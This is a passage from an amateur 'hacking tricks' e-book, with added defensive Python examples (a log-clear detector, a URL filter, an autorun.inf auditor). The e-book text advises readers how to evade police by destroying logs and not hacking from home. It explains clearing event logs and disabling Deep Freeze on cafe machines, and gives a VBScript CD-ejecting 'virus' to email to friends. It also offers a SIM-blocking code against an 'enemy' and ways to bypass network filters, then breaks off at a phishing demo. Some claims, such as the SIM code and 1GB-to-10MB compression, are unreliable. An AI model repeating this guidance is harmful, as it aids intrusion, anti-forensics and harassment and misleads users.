WEB PROXIES AND PROXY CLIENT/ MANAGERS

Proxy Filter
Hide my ass
Proxify

MAC ADDRESS AND MAC ADDRESS SPOOFING
MAC address is the acronym for Media Access Control address; it is the unique
identifier of a network interface. I like to think of it as the fingerprint of your connection.
MAC address spoofing is using a program (you can do it manually, but a program
is much easier) to change your MAC address so it doesn't leave your network
"fingerprint" behind. Keep in mind what a MAC address can and cannot reveal: it is
only visible on the local network segment (the hotspot, the router, the DHCP server's
lease log), never to a website on the internet, so spoofing it protects you against the
network you are sitting on, not against the server you connect to.
MAC ADDRESS SPOOFERS [TOOLS]

SMAC
Nmap (its --spoof-mac option only applies to the packets Nmap itself sends)
macchanger (Linux)


WITHOUT ANY SOFTWARE (HIDE MAC)
Most people say that it is not possible to change a MAC address without
software. So here I'm telling you a secret, easy and the best way to change it!
STEPS as follows:
Open Command Prompt (Win+R > type cmd > press Enter). Now type "getmac".
It will show your current MAC address. If you like, write it down in
Notepad or anywhere.
After noting your MAC address, go to Start > Control Panel > Network and
Internet > Network & Sharing Center, then click on "Change Adapter Settings",
which is found in the top left corner.
In "Change Adapter Settings" you will see "Bluetooth Network
Connection", "Wireless Network Connection", "Local Area Connection". Right-click
on "Local Area Connection", click "Properties", then "Configure", and go to the
"Advanced" tab. Select "Network Address". By default it will be "Not Present". Choose
"Value" and enter the MAC address you want (12 hex digits, no separators). Don't
change much, just 2 or 3 digits, but keep the second digit even so the address stays
unicast; many Wi-Fi drivers only accept a locally administered address (second digit
2, 6, A or E). Click OK and wait till the connection is re-established.
Enjoy, you have successfully changed your MAC address. If you like, you
can check it with "getmac" as in the first step.
Note: this way you can change the MAC address on XP, Vista, Win7 and Win8,
provided the driver exposes the "Network Address" property.
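Changing "2 or 3 digits" by hand can produce a multicast address (odd first octet) that the adapter silently rejects, or land inside some vendor's OUI range and collide with a real device. The helper below is an added example, not code from the book: it parses the common MAC notations, classifies the two bits in the first octet that matter (multicast and locally administered, per IEEE 802), generates a random usable address, and formats it for the Windows "Network Address" field and for Linux's `ip link` command. It touches no real adapter.

```python
"""Generate and validate a MAC address for spoofing.

Added example (not from the book). Only the first octet decides whether an
address is usable: bit 0 set = multicast (never valid as a source),
bit 1 set = locally administered (outside every vendor's OUI range).
"""
import os
import re

MAC_RE = re.compile(r"^" + r"([0-9a-f]{2})[:-]?" * 5 + r"([0-9a-f]{2})$", re.IGNORECASE)


def parse_mac(text):
    """Accept aa:bb:cc:dd:ee:ff, AA-BB-CC-DD-EE-FF or aabbccddeeff; return 6 bytes."""
    m = MAC_RE.match(text.strip())
    if not m:
        raise ValueError("not a MAC address: %r" % text)
    return bytes(int(group, 16) for group in m.groups())


def classify(mac):
    """Flags from the first octet: bit 0 = multicast, bit 1 = locally administered."""
    first = parse_mac(mac)[0]
    return {"multicast": bool(first & 0x01), "locally_administered": bool(first & 0x02)}


def is_usable_spoof(mac):
    """Unicast and locally administered: accepted by drivers, collides with nobody."""
    flags = classify(mac)
    return not flags["multicast"] and flags["locally_administered"]


def random_local_mac():
    """Random unicast, locally administered address (first octet ends in binary 10)."""
    octets = bytearray(os.urandom(6))
    octets[0] = (octets[0] & 0xFC) | 0x02   # clear multicast bit, set local bit
    return ":".join("%02x" % o for o in octets)


def format_for_windows(mac):
    """The Windows 'Network Address' field takes 12 hex digits, no separators."""
    return parse_mac(mac).hex().upper()


def format_for_linux(mac):
    """`ip link set dev eth0 address <this>` wants colon-separated hex."""
    return ":".join("%02x" % o for o in parse_mac(mac))


if __name__ == "__main__":
    candidate = random_local_mac()
    print(candidate, classify(candidate), is_usable_spoof(candidate))
    print("windows:", format_for_windows(candidate), " linux:", format_for_linux(candidate))
```

On Linux the same change is `ip link set dev eth0 down`, `ip link set dev eth0 address <mac>`, `ip link set dev eth0 up`; the address checks are the same.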


SECURE YOUR HACKING

After learning this hacking stuff I don't think anybody is going to leave it! So, this
is the way to do it. The tips given here are meant to make it difficult for the cyber police
to catch you, but how well they work depends on how carefully you have secured
yourself!

1) HOW HACKERS GET CAUGHT

The first thing that gives you away is LOGS. You need to know how event,
application and system logs work. If you don't, you can be caught easily!
The shell history will expose your actions. Another giveaway is leaving a
":wq" (vi's save-and-quit, typed into the wrong window) in /var/log/messages or in
binaries you edited.
Your laziness will get you into trouble. NEVER HACK FROM HOME!
Take your time, and go to a net cafe or anywhere else apart from home.
Logs will take you down!
The code that you run on the system will take you down. If you compile
code on the target, the libraries it links and the tools you leave behind will give you away!
If your victim notices that he may have been hacked, or that something is wrong, he
will ask his ISP for IP logs, and if you don't use a VPN, or if you hack
from home, they will hunt you down.
The thing that takes you down 100% is BRAGGING. It is a common problem
with beginning hackers. They like to brag to earn respect and reputation, NOT
KNOWING that it is a matter of minutes, hours, maybe days before they are caught.
*Don't rely on a free webmail account such as Hotmail for cover: the provider keeps
its own connection logs and answers lawful requests.


2) HIDING AND SECURING YOURSELF AS A "HACKER"

Temporary guest accounts, unrestricted proxy servers, buggy
Wingate servers and anonymous accounts can keep hackers
carefree.
A young hacker is less likely to know all the little things that an expert
hacker might know. Besides, the young hacker may be trying to
impress others and get a little careless about covering his tracks.
This is why younger hackers are often caught.
An older hacker, on the other hand, will rarely leave any tracks. They
know how to use machines they already control as a launching
place to get into another computer.

There will always be hackers, and there will always be hackers in prison.
DESTROY LOGS, REMOVE ALL YOUR TRACKS!
DO NOT HACK FROM HOME! USE A VPN THAT KEEPS NO LOGS!



HOW TO REMOVE YOUR SYSTEM LOGS:

Choose Start >Control Panel.
Double-click Administrative Tools, and then double-click Event Viewer.
In either pane of the Event Viewer window, right-click System and then select
Clear All Events.
To save the current system log, click Yes when Windows returns the message,
"Do you want to save 'System' before clearing it?", enter a file name for the
saved system log file, and then click Save.
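Clearing a log this way is itself recorded, and that record is what a defender watches for. The following Python is an added example, not part of the e-book: it scans a constructed export of forwarded events for event ID 104 (System log cleared, provider Microsoft-Windows-Eventlog) and event ID 1102 (Security log cleared, provider Microsoft-Windows-Security-Auditing) and flags a burst of clears across logs. The export format and every record in it are constructed for the example.

```python
"""Spot a cleared Windows event log in an exported event list.

Added example for this section; it is not code from the e-book. The records are
constructed (one per line, tab-separated: time, log name, provider, event id,
message), as a collector that receives forwarded events might hold them. The
two event IDs it keys on are real: clearing the System log writes event 104
from Microsoft-Windows-Eventlog ("The System log file was cleared") and
clearing the Security log writes event 1102 from
Microsoft-Windows-Security-Auditing ("The audit log was cleared").
"""
import csv
import io
from datetime import datetime

# (log name, event id) pairs Windows writes when that log is wiped
LOG_CLEARED_EVENTS = {
    ("System", 104),     # The System log file was cleared
    ("Security", 1102),  # The audit log was cleared
}

TIME_FORMAT = "%Y-%m-%d %H:%M:%S"

# Constructed sample export: two routine events, then both logs cleared
SAMPLE_EXPORT = (
    "2013-06-01 10:02:11\tSystem\tService Control Manager\t7036\t"
    "The Windows Update service entered the running state.\n"
    "2013-06-01 10:15:40\tSecurity\tMicrosoft-Windows-Security-Auditing\t4624\t"
    "An account was successfully logged on.\n"
    "2013-06-01 10:31:05\tSystem\tMicrosoft-Windows-Eventlog\t104\t"
    "The System log file was cleared.\n"
    "2013-06-01 10:31:07\tSecurity\tMicrosoft-Windows-Security-Auditing\t1102\t"
    "The audit log was cleared.\n"
    "2013-06-01 10:32:00\tSystem\tService Control Manager\t7036\t"
    "The Print Spooler service entered the stopped state.\n"
)


def parse_export(text):
    """Turn the tab-separated export into a list of record dicts."""
    records = []
    for fields in csv.reader(io.StringIO(text), delimiter="\t"):
        if len(fields) != 5:
            continue  # blank or malformed line
        when, log, provider, event_id, message = fields
        records.append({
            "time": datetime.strptime(when, TIME_FORMAT),
            "log": log,
            "provider": provider,
            "event_id": int(event_id),
            "message": message,
        })
    return records


def find_log_clears(records):
    """Every record that marks a log being cleared, oldest first."""
    hits = [r for r in records if (r["log"], r["event_id"]) in LOG_CLEARED_EVENTS]
    return sorted(hits, key=lambda r: r["time"])


def is_sweep(records, window_seconds=60):
    """True when two different logs were cleared within the window:
    one accidental clear happens, a burst across logs is cleanup."""
    clears = find_log_clears(records)
    for earlier, later in zip(clears, clears[1:]):
        gap = (later["time"] - earlier["time"]).total_seconds()
        if earlier["log"] != later["log"] and gap <= window_seconds:
            return True
    return False


if __name__ == "__main__":
    recs = parse_export(SAMPLE_EXPORT)
    for hit in find_log_clears(recs):
        print(hit["time"], hit["log"], hit["event_id"], hit["message"])
    print("sweep:", is_sweep(recs))
```

On the cleared machine the oldest surviving entry of each log is the clear event itself, so the alert fires on 104/1102 rather than on any earlier record; the earlier records only exist if the host forwarded them somewhere else before the wipe.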


I recommend using a paid VPN that keeps no logs.

FACEBOOK AND OTHER TRICKS!
Curiosity about peeking into others' profiles turns many guys into hackers.

It is, of course, the most common reason for many people to turn into a hacker,
a kiddie, a beginner! So, here we go with the stuff you wanted!
This part includes tricks, tips and digital social hacking methods!
Let's start with the tricks!
FORGOT TO LOGOUT?
FORGOT TO LOGOUT FACEBOOK ACCOUNT IN CYBER?
Have you ever forgotten to log out of your Facebook account at a cyber cafe? Then you
might have seen spam going out from your account. From now on, don't worry if you forget to
log out from a computer you won't have access to later, because with
this method you will be able to log out from any computer.
Log in to your account (from anywhere).
Go to Account Settings (located on the right side of Home).
Choose "Security" (you will see the photo below).
Go to Active Sessions (all of your log-ins, from everywhere, are listed there).
Click End Activity and you will be logged out.

CREATE FAKE FACEBOOK CONVERSATION
Want to have fun with your friends by creating a fake conversation? Here we go!
Go to http://fakeconvos.com/ and log in with your Facebook account.
Hit Create in the top header bar.
Enter the name of the commenter. For the image, hit Browse and you will see a new
panel for selecting an image. You can use their image library, or the best way is to
use Google to search for an image of your specific person. Images will be cropped
automatically to suit the profile.
Enter the comment and hit Add to Stream. To add a new comment, follow
the same procedure.
Once you are done creating the fake conversation, hit Save it. To
publish it on your Facebook profile, check Auto publish to Facebook. You can
even take a snapshot and share it on Facebook.
Using Fakeconvos, you can easily create funny conversations and get lots
of likes.

ONLINE CHAT TRICKS:-

Just type the following codes:
Troll face: [[171108522930776]]
ARE YOU FUCKING KIDDING ME: [[143220739082110]]
Not bad Obama: [[169919399735055]]
Me Gusta: [[211782832186415]]
Mother of God: [[142670085793927]]
Cereal Guy: [[170815706323196]]
LOL Face: [[168456309878025]]
NO Guy: [[167359756658519]]
Yao Ming: [[218595638164996]]
Derp: [[224812970902314]]
Derpina: [[192644604154319]]
Forever Alone: [[177903015598419]]
Not Bad: [[NotBaad]]
Fuck yeah: [[105387672833401]]
Challenge accepted: [[100002727365206]]
Okay face: [[100002752520227]]
Dumb bitch: [[218595638164996]]
Poker face: [[129627277060203]]
Okay face: [[224812970902314]]
Socially awkward penguin: [[98438140742]]
Rage face: [[FUUUOFFICIAL]]
Lamp: [[100001256102462]]
No: [[167359756658519]]
MOG: [[142670085793927]]
Feel like a sir: [[168040846586189]]
Forever alone christmas: [[125038607580286]]
NOTE: You have to type the [[ ]] brackets as well, otherwise it won't work.

HOW TO TYPE SYMBOLS WITH KEYBOARD

Alt + 0153 ... trademark symbol
Alt + 0169 ... copyright symbol
Alt + 0174 ... registered trademark symbol
Alt + 0176 ... degree symbol
Alt + 0177 ... plus-or-minus sign
Alt + 0182 ... paragraph mark
Alt + 0190 ... fraction, three-fourths
Alt + 0215 ... multiplication sign
Alt + 0162 ... the cent sign
Alt + 0161 ... upside down exclamation point
Alt + 0191 ... upside down question mark
Alt + 1 ... smiley face
Alt + 2 ... black smiley face
Alt + 15 ... sun
Alt + 12 ... female sign
Alt + 11 ... male sign
Alt + 6 ... spade
Alt + 5 ... club
Alt + 3 ... heart
Alt + 4 ... diamond
Alt + 13 ... eighth note
Alt + 14 ... beamed eighth note
Alt + 8721 ... N-ary summation (auto sum)
Alt + 251 ... square root checkmark
Alt + 8236 ... infinity
Alt + 24 ... up arrow
Alt + 25 ... down arrow
Alt + 26 ... right arrow
Alt + 27 ... left arrow
Alt + 18 ... up/down arrow
Alt + 29 ... left right arrow


HOW TO REMOVE DEEP FREEZE WITHOUT ANY SOFTWARE.

You can uninstall Deep Freeze without using any programs or bootable disc to
delete the driver and keys. Here's what I did when I hacked a Windows XP machine in an internet
cafe. You have to be quick, or else it fails.

1. Just go to the BIOS setup and change the date 3 years backward from now, because
Deep Freeze doesn't exist in that year. Save it and restart your computer.
2. After restarting your computer, press F8 to select the boot option. Select Windows
Debugging mode.
3. When the welcome screen appears, be ready with your fingers on CTRL + ALT +
DEL, or on the shortcut key to Task Manager.
4. When the desktop appears, hit the three keys quickly. The Windows Task Manager should
appear when you hit CTRL + ALT + DEL.
5. Quickly kill the process DF5Serv.Exe: select it and press DEL to kill it. Once the process
DF5Serv.Exe is gone, it's done.
6. Restart your computer and change the date back to the present date. Then boot up your
computer. There you will see the Deep Freeze tray icon marked with an X, which means it is disabled.
Use the Deep Freeze installer to uninstall Deep Freeze and install it again if you like.
Enjoy!


CREATE A FUNNY VIRUS THAT CONTINUOUSLY EJECTS CD/DVD DRIVES:

Step 1: Open Notepad and copy the code given below into it

' Windows Media Player COM object; its cdromCollection lists every optical drive
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
Do
    If colCDROMs.Count >= 1 Then
        ' First pass: eject every drive
        For i = 0 To colCDROMs.Count - 1
            colCDROMs.Item(i).Eject
        Next
        ' Second pass (on drives where Eject toggles the tray, this pulls it back in)
        For i = 0 To colCDROMs.Count - 1
            colCDROMs.Item(i).Eject
        Next
    End If
    WScript.Sleep 5000    ' wait five seconds, then repeat forever
Loop

Step 2: Save it as eject.vbs in any location.
You can use any name, but it must have the .vbs extension.
Make sure that the "All Files" option is selected in the "Save as type" drop-down
list.
Step 3: Open your saved file.
It will continuously eject all your connected optical drives!!!
If you put them back in, it will pop them out again. :P :P
To stop this program,
End the wscript.exe process in the Task Manager.
Or
Restart your computer.
Send this file to your friends as an email attachment and have fun :P ;)
DO NOT WORRY... IT IS COMPLETELY HARMLESS!!!

COMPRESS 1GB DATA INTO 10MB
KGB archiver is the compression tool that makes that happen.

Pros: -
Very high compression ratio with accurate results and no loss of data.

Cons: -
Due to the high compression rate, the time required to compress and decompress the file
is high.

Download Link - www.sourceforge.net/projects/kgbarchiver

DELMES VIRUS CREATOR
It's a batch-file virus generator which generates viruses that carry out funny
actions on a PC.
Download it from here: http://adfoc.us/10187330741865

HOW TO CHANGE THE ICON OF YOUR PEN DRIVE

Download the icon, then go to Notepad and type
[autorun]
icon=(icon name).ico
without the ( )

Then save it in your pen drive with the name autorun.inf

NOTE: Both the icon and the autorun.inf file must be in your pen drive, otherwise it will not work. Then
hide both files. Unplug the pen drive and insert it again, and your pen drive icon
is changed.

HOW TO KEEP YOUR LAPTOP TURNED ON WHILE ITS LID IS CLOSED.

1) First, you need to open the Local Group Policy Editor. (To open the Local Group Policy
Editor: open Run [Windows key + R], then type: Gpedit.msc)
2) Now go to Administrative Templates. (It's right there, just under the heading Local
Computer Policy.)
3) When you go to Administrative Templates, you will see some options. Choose All
Settings from the options (on my laptop, it's the last option).
4) Are you there yet? If so, scroll down until you see Select the lid switch action
(plugged in).
5) Go there and change the setting to Enabled. Normally it will be Not
Configured.
6) Then change the option in it to Take no action. This will make your laptop take
no action even if the lid is closed.
Note: This is only for (plugged in). This means if the laptop is not plugged in it may
shut down or hibernate. But don't worry. If you want it to take no action when closed
while it's running on its battery, then make one more change in the settings. For this,
when you have finished the Plugged in settings (Steps 4, 5, 6), close that window and
scroll down to see Select the lid switch action (battery). Go there and follow
Steps 5 and 6.

LEARN HOW TO ACCESS BLOCK WEBSITE IN COLLEGE

Everyone knows that in colleges and offices social networking
sites like Friendster, Facebook, Myspace, Bebo, Hi5, Orkut, etc. are blocked by the
admin, and you are not able to access these sites without admin permission.

1) Using the IP Instead of the URL
This depends on the software/application used. Sometimes blocked sites are
stored as a list of URLs (e.g. www.yahoo.com, www.gmail.com, etc.) and typing the IP
instead of the URL might sometimes work. On a local computer, running a ping
domain.com command (ping www.facebook.com) in Command Prompt (Mac users
use Terminal) will return the IP address. You can also find the IP of a website online: visit
www.whatsmyip.org

2) Redirection with a Short URL service
Sometimes the URL you intend to browse might be banned, but converting it to
a shorter URL with a short URL service might just help you bypass the
settings.
Here are 2 short URL services we've previously mentioned: MooURL, SnipURL.

3) Google Cache
Search engines like Google and Yahoo cache webpages, and these cached
pages are stored by the search engines themselves rather than at the blocked
address. Clicking on the cache will bring you to a cached version of the page, as
up to date as Google's last crawl of it.

4) Internet Archive Wayback Machine
The Wayback Machine is an internet service that periodically keeps a copy of almost
all websites on the Internet from the date they were started. Clicking on the latest
copy that the Wayback Machine has should be somewhat similar to the real site.
Another way to access blocked sites via caches.

5) Anonymous Surfing
Some sites let you use their proxy or domain to surf
other sites anonymously. Here are some proxy websites:
#http://www.hidemyass.com/
#http://www.anonymizer.com/
#http://www.wujie.net/
#http://www.ultrareach.net/
#http://invalid.invalid/
#http://www.guardster.com/subscription/proxy_free.php
#http://anonymouse.ws/anonwww.html
#http://www.browser-x.com/
#http://www.spysurfing.com/
#http://www.xerohour.org/hideme
#http://www.proxyz.be/

6) Use a Proxy in your Browser (VPNs also use this)
There are many sites out there that distribute free proxies from almost any
country. Here's an example. Check out the following methods on how/where to insert
proxies in your web browser:
Proxy Surfing in Firefox
Under the Advanced tab, select the Network tab, then click Connection Settings.
Select Manual proxy configuration and put the proxy under HTTP proxy.
Proxy Surfing in Internet Explorer
Go to Tools -> Internet Options. Select the Connections tab. Click LAN Settings,
check Proxy Server. Insert your proxy URL in Address.

7) Bypass with Translation services
Online translation services like AltaVista BabelFish and Google Translate allow
you to translate a website from one language to another and display the translated
results on their own page. The trick here is to enter the URL (of the website you're blocked from),
translate it even if you don't need to, and let Google or AltaVista fetch the
content for you.

8) Subscribe to the RSS Feed
This might not work for all sites, but if the site you intend to visit provides RSS
feeds, you can subscribe and read it with an RSS reader, or have it regularly send the
contents to your email.

9) Retrieve web pages via Email
Web2Mail is a free service that sends websites you want to read right into your
inbox. All you need to do is send an email to www@web2mail.com with the URL as the
subject title.
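From the admin's side, method 1 works only because the filter compares host names. The following Python is an added example, not from the e-book: a name-only filter beside one that also refuses IP literals belonging to a blocked name. The blocked name is the section's own facebook.com; the DNS answers are a constructed table using a documentation address, so nothing is looked up on the network.

```python
"""A URL filter that a bare IP cannot walk around.

Added example for this section; it is not code from the e-book. The blocked
name is the section's own example (facebook.com); RESOLVED is a constructed
stand-in for DNS using a documentation address (203.0.113.0/24), so nothing
here touches the network.
"""
import ipaddress
from urllib.parse import urlsplit

BLOCKED_DOMAINS = {"facebook.com"}

# Constructed DNS answers for the blocked name and one of its hostnames
RESOLVED = {
    "facebook.com": "203.0.113.10",
    "www.facebook.com": "203.0.113.10",
}


def _hostname(url):
    return (urlsplit(url).hostname or "").lower().rstrip(".")


def _under(host, domain):
    """True if host is the domain itself or a name beneath it."""
    return host == domain or host.endswith("." + domain)


def naive_is_blocked(url):
    """Name-only check, the kind of filter that method 1 walks around."""
    host = _hostname(url)
    return any(_under(host, d) for d in BLOCKED_DOMAINS)


def blocked_addresses():
    """Addresses that the blocked names (and their hostnames) resolve to."""
    return {
        addr for name, addr in RESOLVED.items()
        if any(_under(name, d) for d in BLOCKED_DOMAINS)
    }


def is_blocked(url):
    """Name check plus: an IP literal is blocked if a blocked name resolves to it."""
    host = _hostname(url)
    if not host:
        return False
    try:
        literal = ipaddress.ip_address(host)
    except ValueError:
        return naive_is_blocked(url)  # a name, not an address
    return str(literal) in blocked_addresses()


if __name__ == "__main__":
    for url in ("http://www.facebook.com/", "http://203.0.113.10/"):
        print(url, "naive:", naive_is_blocked(url), "resolved:", is_blocked(url))
```

Methods 2 to 9 are the same gap seen from the other side: the filter inspects the name the user typed, not the host the bytes finally come from, so a real filter has to decide on the resolved address of the final destination (after redirects) rather than on the first URL.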

HOW TO BLOCK YOUR ENEMY'S SIM CARD

Here is a simple trick to block your enemy's SIM card; blocking a SIM card is very simple.
What you have to do is just enter the code below on the desired phone:
**04*3814*7529*68243#
Entering the above code will ask you to enter the PUK code. To solve this issue, just
call customer care and get your PUK code.
Note: Entering an invalid PUK will cause permanent blocking of your SIM.

CHANGING ICONS

Here is a simple tweak by which you will be able to change this monotonous icon to
anything you like, even your own picture if you wish.

You can put any image in place of the one I have shown, even the picture of your
favourite celebrity, your dream car or your own picture.

Here are the steps you need to follow:

1. First of all, the picture you want to use should have the .ico extension (if you
already have a picture with the .ico extension, proceed to step
2. Most of the pictures we normally use have extensions like
.jpg, .bmp, .png, .gif etc., so you first need to convert them to one with the .ico
extension. This is simple:
and put your original image in the 'Source Image' section, then click on the
'Generate Favicon.ico' button to get your image with the .ico extension.

3. Now go to My Computer. Suppose you want to put this icon in place of
your original C: image. Double click and enter C:. Paste your .ico image
file in it. Also create a new text file and in it type the following lines:
[autorun]
ICON=favicon.ico

Remember that 'favicon.ico' in the second line is the name of your image file. If
you have an image file with the .ico extension by the name of 'abc.ico', then use that in
the second line in place of 'favicon.ico'.

4. Now rename this text file as 'autorun.inf' (without the quotes).

5. Important note: How do I rename my text file as autorun.inf? Answer: Go to
Tools -> Folder Options. Under the View tab, uncheck 'Hide extensions for
known file types'. Press Apply. Now rename your text file as 'autorun.inf'.
Now restart your PC. You are done. Check out the cool new picture you have just
added in your My Computer panel.
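Both autorun.inf tricks above only set the icon key; the same file with an open or shellexecute key launches a program when the drive is plugged in, which is how autorun worms spread from pen drives. The following Python is an added example, not from the e-book: it parses an autorun.inf and reports whether it is purely cosmetic or would run code. The two sample files and the RECYCLER\setup.exe name are constructed; open, shellexecute and shell\...\command are real autorun.inf keys.

```python
"""Tell a cosmetic autorun.inf from one that launches a program.

Added example for the two autorun.inf sections above; it is not code from the
e-book. Both sample files are constructed: the first is the icon-only file the
text describes, the second is the shape a USB worm leaves behind (open,
shellexecute and shell\\...\\command are real autorun.inf keys; the file name
RECYCLER\\setup.exe is made up).
"""
import configparser

ICON_ONLY = """\
[autorun]
icon=favicon.ico
"""

WITH_LAUNCH = """\
[autorun]
icon=favicon.ico
open=RECYCLER\\setup.exe
shellexecute=RECYCLER\\setup.exe
shell\\open\\command=RECYCLER\\setup.exe
action=Open folder to view files
"""

# Keys that only change how the drive looks in Explorer
COSMETIC_KEYS = {"icon", "label"}


def parse_autorun(text):
    """Return the [autorun] section as a dict with lower-case keys."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(text)
    for section in parser.sections():
        if section.lower() == "autorun":
            return {key.lower(): value.strip() for key, value in parser.items(section)}
    return {}


def launch_entries(text):
    """The entries that run, or offer to run, a program."""
    entries = parse_autorun(text)
    return {
        key: value for key, value in entries.items()
        if key in ("open", "shellexecute") or key.startswith("shell\\")
    }


def audit_autorun(text):
    """Verdict and the offending entries.

    'empty'         no [autorun] section at all
    'launches code' open / shellexecute / shell\\...\\command present
    'cosmetic'      only icon and label keys
    'review'        other keys only (e.g. action), worth a look but no launcher
    """
    entries = parse_autorun(text)
    if not entries:
        return "empty", {}
    launches = launch_entries(text)
    if launches:
        return "launches code", launches
    if set(entries) <= COSMETIC_KEYS:
        return "cosmetic", {}
    return "review", {}


if __name__ == "__main__":
    for sample in (ICON_ONLY, WITH_LAUNCH):
        print(audit_autorun(sample))
```

The check belongs wherever removable media is inspected before use: an autorun.inf that is only icon and label is harmless decoration, while any of the launch keys means the file is there to get something executed, whatever icon it shows.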

THINGS THAT MICROSOFT COULD NOT EXPLAIN!

TRY this....

MAGIC #1

Nobody can create a FOLDER anywhere on the computer which is
named "CON". This is something funny and inexplicable? At Microsoft the whole team couldn't answer why this
happened! TRY IT NOW, IT WILL NOT CREATE A "CON" FOLDER
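What is behind this: CON, PRN, AUX, NUL, COM1 to COM9 and LPT1 to LPT9 are MS-DOS device names that Windows reserves in every directory, so a file or folder with that name (with or without an extension) is refused because the name resolves to the device. The following Python is an added example, not from the e-book: it checks a name against that list and shows how a web application that writes user-supplied file names to a Windows disk should sanitise them. The function names are the example's own.

```python
"""Why a folder named CON cannot be created, and how to validate file names.

Added example; it is not code from the e-book. CON, PRN, AUX, NUL, COM1..COM9
and LPT1..LPT9 are MS-DOS device names that Windows reserves in every
directory, so a file or folder whose stem is one of them is refused. The same
check belongs in any application that stores uploads under a user-chosen name.
"""
import re

RESERVED_STEMS = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{n}" for n in range(1, 10)}
    | {f"LPT{n}" for n in range(1, 10)}
)

# Characters Windows forbids in a file name, plus ASCII control characters
_BAD_CHARS = re.compile(r'[<>:"/\\|?*\x00-\x1f]')


def is_reserved_name(name):
    """True if Windows would treat the name as a device, extension or not.

    Windows looks at the part before the first dot, so CON.txt is reserved too.
    """
    stem = name.strip().rstrip(". ").split(".")[0].strip().upper()
    return stem in RESERVED_STEMS


def safe_filename(name, replacement="_"):
    """Turn an untrusted name into one both Windows and POSIX accept."""
    cleaned = _BAD_CHARS.sub(replacement, name).strip().rstrip(". ")
    if not cleaned:
        cleaned = "unnamed"
    if is_reserved_name(cleaned):
        cleaned = replacement + cleaned  # "_con" is an ordinary name
    return cleaned


if __name__ == "__main__":
    for candidate in ("CON", "con.txt", "CONSOLE", "COM10", "a<b>:c.txt"):
        print(candidate, is_reserved_name(candidate), safe_filename(candidate))
```

The reason it matters beyond the party trick: an upload handler that accepts "con" or "nul.jpg" as a name and then opens it for writing will not be writing a file at all, and a name like "..\x.txt" is the better known cousin of the same class of bug.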

MAGIC #2

For those of you using Windows, do the following:
1.) Open an empty notepad file
2.) Type "Bush hid the facts" (without the quotes)
3.) Save it as whatever you want.
4.) Close it, and re-open it.
Noticed the weird bug? No one can explain!

MAGIC #3

Again this is something funny and can't be explained?
At Microsoft the whole Team, including Bill Gates, couldn't answer why this happened!
It was discovered by a Brazilian. Try it out yourself?
Open Microsoft Word and type
=rand (200, 99)

And then press ENTER And see the magic?..!

Magic #4

Did you know that the flight number of one of the planes that hit one of the two WTC
towers on 9/11 was Q33N? In Notepad / WordPad or MS Word, type that flight number,
i.e. Q33N. Increase the font size to 72.
Change the font to Wingdings. ..... You will be amazed by the findings!!!

MAKE A FLIP3D ICON IN THE TASKBAR

Flip3D was a fun and cool looking feature in Windows Vista that can be very useful
for switching between windows. With the improved Windows 7 taskbar, Flip3D was
replaced with improved thumbnails and Aero Peek. Those are both good alternatives
but I like the speed of viewing all my open windows at once and switching with just
two clicks.

This article will show you how to create a Flip3D icon on the Windows 7 taskbar:

Right click on the Desktop and select New and then Shortcut.
Type in RunDll32 DwmApi #105 in the location box and click Next.
Type in Flip3D as the Name and click Finish.
You will now have a shortcut on the desktop that will launch Flip3D, but it has the
wrong icon. Right click on the Flip3D shortcut and select Properties.
On the Shortcut tab click the Change Icon button.
Change the "Look for icons in this file" text box to C:\windows\explorer.exe and press Enter.
The Flip3D icon will now be available. Select it and click OK.
Click OK to close out the shortcut properties window.
Finally, just drag and drop the new shortcut on the Windows 7 taskbar to pin it.

HOW TO LOCK FOLDER ON WINDOWS USING RECYCLE BIN
Hello friends, here I am going to share a tip which will help you lock a folder to
protect your important data, as well as data that needs to be locked to prevent
access. There are lots of utilities available that will help you achieve this, but they are all
trial versions or limited versions in some way.
So, if you want to lock a folder on your PC, please follow the steps below. Note that
these changes involve the Windows registry, so avoid this if you are not
technically confident :)
Here is the way you can lock any folder using the Recycle Bin:
Open Run on your computer (or press Ctrl + R) and type the regedit command.
You will see a list of keys and related values. Navigate through the list until you find
the CLSID of the Recycle Bin in Registry Editor.
For example:
the CLSID of the Recycle Bin is >> {645FF040-5081-101B-9F08-00AA002F954E}
Now it's time to lock the folder using the Recycle Bin, so let's say you want to lock a folder
named Folder1. Inside Notepad type the following line:

ren folder1 recycle.{645FF040-5081-101B-9F08-00AA002F954E}

and save that file as lock.bat.
To unlock the locked folder, you can create another batch file which will unlock
the folder. Type the line below in another Notepad file and save that as unlock.bat
(ren needs the name to restore as its second argument):

ren recycle.{645FF040-5081-101B-9F08-00AA002F954E} folder1

So, whenever you want to lock the folder, execute the lock.bat you created, and execute
unlock.bat to unlock it again.

HOW TO SET VIDEO AS DESKTOP WALLPAPER

1. Open VLC Media Player.
2. Then go to Tools > Preferences or press CTRL + P and select Video from the left panel.
3. Then choose DirectX video output from the output drop-down list.
4. Save the changes and restart VLC Media Player.
5. Play any video you would like to set as your desktop wallpaper.
6. Then click on Video and select DirectX Wallpaper from the dropdown list.
7. Now Minimize VLC player and you will see your video running on your desktop as
wallpaper.
8. If you want your default wallpaper back then uncheck DirectX Wallpaper from video
dropdown list.

GENERALISED ACCOUNT HACKING
The most awaited topic for beginners !
Here I am giving some generalized ways ( popular ) to hack any kind of account!
SO FIRSTLY, PHISHING!
INTRODUCTION TO PHISHING
According to Wikipedia -> Phishing is the act of attempting to acquire
information such as usernames, passwords, and credit card details (and sometimes,
indirectly, money) by masquerading as a trustworthy entity in an electronic
communication. Communications purporting to be from popular social web sites,
auction sites, online payment processors or IT administrators are commonly used to
lure the unsuspecting public. Phishing emails may contain links to websites that are
infected with malware.
Phishing is typically carried out by e-mail spoofing, instant messaging and it
often directs users to enter details at a fake website whose look and feel are almost
identical to the legitimate one. Phishing is an example of social engineering
techniques used to deceive users and exploits the poor usability of current web
security technologies. Attempts to deal with the growing number of reported phishing
incidents include legislation, user training, public awareness, and technical security
measures.
A phishing technique was described in detail in 1987, and (according to its
creator) the first recorded use of the term phishing was made in 1995. The term is a
variant of fishing, probably influenced by phreaking, and alludes to baits used in
hopes that the potential victim will bite by clicking a malicious link or opening a
malicious attachment, in which case their financial information and passwords may
then be stolen.
From all the information above you now know what phishing exactly is.
So let's now start with its demonstration on one of your favorite websites.


DEMONSTRATION WITH FACEBOOK
So now, let's start the demonstration of phishing with one of your favorite social
networking or email websites. There are many more, and this method
